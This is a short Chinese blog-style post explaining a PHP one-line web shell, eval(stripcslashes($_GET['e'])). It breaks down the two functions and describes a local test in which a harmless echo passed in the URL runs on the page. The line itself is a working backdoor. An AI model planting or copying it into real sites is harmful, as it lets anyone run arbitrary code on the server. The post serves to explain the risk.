php的一句话木马

偶尔发现一句php代码：

eval(stripcslashes($_GET['e']));

有人说这是一句话木马，于是有了兴趣，便在W3C查了下函数，分析了一下，果然有些可怕。

eval()函数会执行括号内的字符串，比如

eval("echo 'hello world!';");

等同于：

echo "hello world!";

stripcslashes()函数是去反斜杠的，反斜杠通常是用来转义的，以便能够更好更完整的存入数据，读取数据时就需要把它去掉。

结合起来看，这句代码的意思是：执行e参数的值，就是客户端请求什么，服务器执行什么，自己的服务器被别人操控，这不就是木马吗？

我在自己的本地网站上测试了一下，主页加入了这句代码，然后再主页地址后加上这句：?e=echo 'hello world';果然在主页的左上角显示了hello world